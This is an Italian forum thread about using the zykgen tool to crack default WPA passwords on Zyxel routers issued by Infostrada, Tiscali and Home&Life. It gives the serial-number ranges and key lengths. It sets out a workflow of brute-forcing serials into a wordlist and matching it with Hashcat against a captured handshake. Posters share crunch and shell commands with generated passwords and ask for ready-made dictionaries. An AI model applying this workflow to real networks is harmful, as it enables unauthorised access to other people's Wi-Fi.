Tool Keygen WPA default Zyxel (Home&Life-Infostrada-Tiscali)

Ciao ragazzi ma funziona con il modello VMG8828-B50B con ssid Wind3 HUB-xxxxxx? Io ho provato ma non funziona (almeno non con l'algoritmo Cosmopolitan)? Addirittura questo modello non esiste nemmeno su internet...
 
Ultima modifica:
Ciao ragazzi ma funziona con il modello VMG8828-B50B con ssid Wind3 HUB-xxxxxx? Io ho provato ma non funziona (almeno non con l'algoritmo Cosmopolitan)? Addirittura questo modello non esiste nemmeno su internet...
Puoi inviarmi in privato una foto del router? e magari il manuale che viene fornito dall'ISP e tutte le informazioni che hai a riguardo, con che offerta viene fornito ecc.. Altrimenti non posso aiutarti, inizio a pensare sia solo un'etichetta farlocca per propinare i loro router, ma senza foto non posso esserne sicuro.
 
Puoi inviarmi in privato una foto del router? e magari il manuale che viene fornito dall'ISP e tutte le informazioni che hai a riguardo, con che offerta viene fornito ecc.. Altrimenti non posso aiutarti, inizio a pensare sia solo un'etichetta farlocca per propinare i loro router, ma senza foto non posso esserne sicuro.

Purtroppo non posso fornirti nulla a riguardo ma penso anche io che sia un'etichetta farlocca altrimenti non avrebbe alcun senso.
 
Ciao J4ck, sto cercando di fare il run del repository che hai pubblicato si GitHub su un telefono android 9 con termux. Ho inoltre anche termux api installato. Riesco ad eseguire semplici programmi come faccio di solito se il build me li creo da solo ma non so eseguire la tua repository e testarla. Sto cercando di fare un test con il router pubblicato sul manuale della Wind. Mi potete dare una mano gentilmente?
 
Ciao J4ck, sto cercando di fare il run del repository che hai pubblicato si GitHub su un telefono android 9 con termux. Ho inoltre anche termux api installato. Riesco ad eseguire semplici programmi come faccio di solito se il build me li creo da solo ma non so eseguire la tua repository e testarla. Sto cercando di fare un test con il router pubblicato sul manuale della Wind. Mi potete dare una mano gentilmente?
Fai il build includendo i sorgenti provenienti da più file separati? ti escono messaggi di errore?. Non ho mai fatto girare go su android ma leggendo in giro mi sembra una cosa ancora molto in fase alpha con termux. Consiglierei di utilizzare direttamente go mobile per crearsi applicativi su android in un file apk, fammi sapere se hai problemi
 
$ go version
go version go1.13.6 android/arm64
$ which go
/data/data/com.termux/files/usr/bin/go
$ go get github.com/luc10/zykgen/cmd/zykgen
$ ls
batt.go mygo storage
$ ls mygo bin src
$ ls src
ls: cannot access 'src': No such file or directory $ ls bin
ls: cannot access 'bin': No such file or directory $ ls
batt.go mygo storage
$ ls storage
dcim external-1 music shared downloads movies pictures


Batt.go mi va benissimo poi il nulla. Sono fermo qui...
Messaggio unito automaticamente:

$ go version
go version go1.13.6 android/arm64
$ which go
/data/data/com.termux/files/usr/bin/go
$ go get github.com/luc10/zykgen/cmd/zykgen
$ ls
batt.go mygo storage
$ ls mygo bin src
$ ls src
ls: cannot access 'src': No such file or directory $ ls bin
ls: cannot access 'bin': No such file or directory $ ls
batt.go mygo storage
$ ls storage
dcim external-1 music shared downloads movies pictures


Batt.go mi va benissimo poi il nulla. Sono fermo qui...
Ho permission denied quando provo a spostare es cocktail.go su home

$ ls
batt.go cocktail.go mygo storage
$ go run cocktail.go
package main: open /data/data/com.termux/files/home/cocktail.go: permission denied
 
Buonasera a tutti, chi mi può dire se ho capito tutto? Allora il tool da GitHub ti dà la password subito un volta inserito zykgen -c SV18xxxxxxxx o genera una wordlist la quale si deve confrontare come hash con il capture es pmkid?
 
Ultima modifica:
Buonasera a tutti, chi mi può dire se ho capito tutto? Allora il tool da GitHub ti dà la password subito un volta inserito zykgen -c SV18xxxxxxxx o genera una wordlist la quale si deve confrontare come hash con il capture es pmkid?

Dovresti specificare la lunghezza della chiave ed il secondo valore del range relativo al SN, a questo punto avrai la tua wordlist.
Messaggio unito automaticamente:

[...]
I router Zyxel ( modelli VMG8823, VMG8825 ) che hanno come SSID :

"Home&Life SuperWiFi-xxxx" (lunghezza password 16 caratteri)
"Infostrada-xxxxxx" (lunghezza password 10 caratteri)
"TISCALI_xxxx" (lunghezza password 10 caratteri)
[...]

Ciao,
il cocktail Cosmopolitan e' valido certamente per il SSID Infostrada con length 10; stessa lunghezza per Tiscali ma il cocktail?
E per quanto riguarda Home&Life, lunghezza 16 ma quale cocktail?
Non ho a portata di mano chiavi da analizzare.
Grazie.
 
Dovresti specificare la lunghezza della chiave ed il secondo valore del range relativo al SN, a questo punto avrai la tua wordlist.
Messaggio unito automaticamente:



Ciao,
il cocktail Cosmopolitan e' valido certamente per il SSID Infostrada con length 10; stessa lunghezza per Tiscali ma il cocktail?
E per quanto riguarda Home&Life, lunghezza 16 ma quale cocktail?
Non ho a portata di mano chiavi da analizzare.
Grazie.
Sempre cosmopolitan per tutti i casi che ho scritto, per trovare degli esempi basta cercare su google immagini dei retro dei router o anche su youtube delle recensioni
 
praticamente chi lo ha usato semplicemente ha detto che è riuscito a farlo funzionare tutti qua, ma non ha detto come
Comunque su windows o gli stessi errori descritti in questo topic idem con kali
L'utente praticamente riuscendoci su kali semplicemente ha copiato le cartelle da kali e le ha messe su windows e ci è riuscito su win bella guida:lamer:
io direi che da kali in qualche modo è riuscito a scaricare qualche file richiesto da zykgen tipo docopot
Tornando al problema su win x64bit una volta installato golang senza problemi non riesco a fare il build perchè non trovi alcuni file kali stessa cosa gli errori sono gli stessi descritti pagine prima è inutile ripostarli,soluzione?
 
  • Mi piace
Reazioni: Kinodertoten
Se ci lavori un po' diventa semplice, leggi sul settaggio go nel wiki. Se non puoi neanche fare questo sei nel posto sbagliato qui. I ragazzi ti d anno una mano ma non possono fare la guida completa su come violare le retti.
 
  • Mi piace
Reazioni: J4ck0xFF
salve un informazione riesco ad eseguire il tuo codice ..ma non riesco ad eseguire il codice modificato (quello con la funzione for)
forse salto qualche passaggio ?

grazie
 
Ciao ragazzi, in questi giorni ho provato ad effettuare quanto da voi esplicato, ma mi sono imbattuto in un problema a cui non sono in grado di dare spiegazione e, perciò, non mi resta che confidare speranzoso nel vostro cortese aiuto.
In Kali Linux ho impostato la mia interfaccia wlan0 in Monitor Mode ma non riesco a comprendere per quale motivo Wireshark riesca ad intercettare esclusivamente pacchetti EAPOL. Mi spiego meglio, connettendomi ad una rete, Wireshark si dimostra in grado di effettuare lo sniffing dei pacchetti del protocollo TCP/IP ma nel momento in cui mi disconnetto, cioè quando dovrei captare i pacchetti broadcast, probe request e probe response, del livello 802.11, wireshark non registra alcun pacchetto. Provando quindi a connettere il pc alla rete TISCALI con una password sbagliata, sono dunque in grado di ottenere i pacchetti EAPOL ma tutte le precedenti probe request e relative response non vengono sniffate. A cosa potrebbe essere dovuto?
PS: Su Wireshark ho provato a rimuovere e riaggiunge la Promiscuous mode e la Monitor mode senza alcun risultato. Inoltre ho tentato la medesima operazione da Windows con Microsoft Network Monitor 3.4, anche questa volta captando esclusivamente pacchetti EAPOL.
 
Ultima modifica:
Ciao a tutti, vi volevo segnalare il seguente codice su github:

I router Zyxel ( modelli VMG8823, VMG8825 ) che hanno come SSID :

"Home&Life SuperWiFi-xxxx" (lunghezza password 16 caratteri)
"Infostrada-xxxxxx" (lunghezza password 10 caratteri)
"TISCALI_xxxx" (lunghezza password 10 caratteri)

generano la password di default della WPA usando il proprio codice seriale (il codice seriale, è un codice identificativo del router, non è la password wpa! ) . Il problema è che tale codice è facile da indovinare perchè seguono un pattern abbastanza semplice:

"Home&Life SuperWiFi-xxxx"/"Home&Life 2.4GHz" Range seriali:
S182V00000000-S182V99999999
S192V00000000-S192V99999999

"Infostrada-xxxxxx" Range seriali:
S172V00000000-S172V99999999
S182V00000000-S182V99999999

"TISCALI_****" Range seriali:
S172V00000000-S172V99999999
S182V00000000-S182V99999999


Il primo carattere è sempre un 'S'.
  • I due caratteri successivi dovrebbero essere l'anno di produzione del router, nell'esempio di sopra abbiamo 2017 ,2018 e 2019.
  • La quarta e quinta lettera ('2V') è costante .
  • Il resto della stringa varia da router a router
Partendo dal codice golang che è già stato implementato, dovete modificarlo in modo da fare un bruteforce nel range dei codici seriali che vi ho messo sopra , calcolare la corrispondente password WPA usando le funzioni che sono già state implementate (in base al tipo di rete dovete scegliere se creare chiavi da 10 o 16 caratteri, guarda sopra per dettagli) e salvarle tutte le password generate su un file di testo. Se tale file di testo venisse usato insieme ad Hashcat ed un handshake catturato, è possibile risalire alla password giusta in meno di mezz'ora.


Possibili risoluzioni da suggerire a Zyxel:
  • Utilizzare un seriale di tipo alfanumerico casuale anzichè puramente numerico con un pattern semplice.
  • Offuscare il codice.
N.B: Per ogni range, vengono generate circa 1Gb di chiavi, non vi preoccupate se il programma macina per un po', se volete aprire il file di testo vi consiglio di farlo con il programma "glogg".
Le reti infostrada sono quelle dei router nuovi, per i router vecchi, che creano la rete con SSID InfostradaWiFi-****** , la password WPA di default è "2"+"MAC router".

EDIT:
Il modello VMG8823-B50B ,come fatto osservare nel seguente commento, trasmette il proprio seriale nelle probe response.

Ciao! avevo bisogno di un informazione: Quali modelli necessitano di quale cocktail? per tiscali è provato che funzionano con -l 10 e -c. hai le altre combinazioni? sto costruendo un dizionario totale ;)

Ho generato con crunch la lista di tutti i seriali possibili ( che sono in sostanza di 3 tipi S172V, S182V, S192V ):
Codice:
crunch 13 13 -t S172V%%%%%%%% + 0123456789 + >  S172V.txt
crunch 13 13 -t S182V%%%%%%%% + 0123456789 + >  S182V.txt
crunch 13 13 -t S192V%%%%%%%% + 0123456789 + >  S192V.txt

# OUTPUT
root@kali:~/Serials# head S172V.txt
S172V00000000
S172V00000001
S172V00000002
S172V00000003
S172V00000004
S172V00000005
S172V00000006
S172V00000007
S172V00000008
S172V00000009
........
S172V99999999

Dopo, passo ogni linea nel plaintext al tuo keygen:

Codice:
while IFS= read -r LINE; do /root/go/bin/zykgen -l 10 -c "$LINE"; done < S172V.txt > S172Vpassword.txt

# OUTPUT
root@kali:~/Serials# head S172Vpassword.txt
M7BJGF4884
TK4YTMHQLT
P7FMBLMLFG
LTDR8D3CU8
F7B38TXYJY
F3TP7XHHRD
T747G3GGAF
J388CXDMKN
8B4E47HNBD
F8K4MKFG73

Comprimerò poi il dizionario con gzip. Se però sapessi le varie combinazioni di lenght e cocktail ottimizzerei le tempistiche :)

Saluti,
Peste666



EDIT:
Quel comando è stralento. Per ora il più veloce che sono riuscito ad ottenere è questo:

Codice:
cat S192V.txt | xargs -n1 zykgen -l 10 -c > dizionario.txt
 
  • Mi piace
Reazioni: faggella
Ciao! avevo bisogno di un informazione: Quali modelli necessitano di quale cocktail? per tiscali è provato che funzionano con -l 10 e -c. hai le altre combinazioni? sto costruendo un dizionario totale ;)

Ho generato con crunch la lista di tutti i seriali possibili ( che sono in sostanza di 3 tipi S172V, S182V, S192V ):
Codice:
crunch 13 13 -t S172V%%%%%%%% + 0123456789 + >  S172V.txt
crunch 13 13 -t S182V%%%%%%%% + 0123456789 + >  S182V.txt
crunch 13 13 -t S192V%%%%%%%% + 0123456789 + >  S192V.txt

# OUTPUT
root@kali:~/Serials# head S172V.txt
S172V00000000
S172V00000001
S172V00000002
S172V00000003
S172V00000004
S172V00000005
S172V00000006
S172V00000007
S172V00000008
S172V00000009
........
S172V99999999

Dopo, passo ogni linea nel plaintext al tuo keygen:

Codice:
while IFS= read -r LINE; do /root/go/bin/zykgen -l 10 -c "$LINE"; done < S172V.txt > S172Vpassword.txt

# OUTPUT
root@kali:~/Serials# head S172Vpassword.txt
M7BJGF4884
TK4YTMHQLT
P7FMBLMLFG
LTDR8D3CU8
F7B38TXYJY
F3TP7XHHRD
T747G3GGAF
J388CXDMKN
8B4E47HNBD
F8K4MKFG73

Comprimerò poi il dizionario con gzip. Se però sapessi le varie combinazioni di lenght e cocktail ottimizzerei le tempistiche :)

Saluti,
Peste666
Attendo con ansia
 
Ciao! avevo bisogno di un informazione: Quali modelli necessitano di quale cocktail? per tiscali è provato che funzionano con -l 10 e -c. hai le altre combinazioni? sto costruendo un dizionario totale ;)

Ho generato con crunch la lista di tutti i seriali possibili ( che sono in sostanza di 3 tipi S172V, S182V, S192V ):
Codice:
crunch 13 13 -t S172V%%%%%%%% + 0123456789 + >  S172V.txt
crunch 13 13 -t S182V%%%%%%%% + 0123456789 + >  S182V.txt
crunch 13 13 -t S192V%%%%%%%% + 0123456789 + >  S192V.txt

# OUTPUT
root@kali:~/Serials# head S172V.txt
S172V00000000
S172V00000001
S172V00000002
S172V00000003
S172V00000004
S172V00000005
S172V00000006
S172V00000007
S172V00000008
S172V00000009
........
S172V99999999

Dopo, passo ogni linea nel plaintext al tuo keygen:

Codice:
while IFS= read -r LINE; do /root/go/bin/zykgen -l 10 -c "$LINE"; done < S172V.txt > S172Vpassword.txt

# OUTPUT
root@kali:~/Serials# head S172Vpassword.txt
M7BJGF4884
TK4YTMHQLT
P7FMBLMLFG
LTDR8D3CU8
F7B38TXYJY
F3TP7XHHRD
T747G3GGAF
J388CXDMKN
8B4E47HNBD
F8K4MKFG73

Comprimerò poi il dizionario con gzip. Se però sapessi le varie combinazioni di lenght e cocktail ottimizzerei le tempistiche :)

Saluti,
Peste666



EDIT:
Quel comando è stralento. Per ora il più veloce che sono riuscito ad ottenere è questo:

Codice:
cat S192V.txt | xargs -n1 zykgen -l 10 -c > dizionario.txt

Grandissimo!
Metteresti a disposizione pure il dizionario per "Home&Life SuperWiFi-xxxx" (lunghezza password 16 caratteri) ?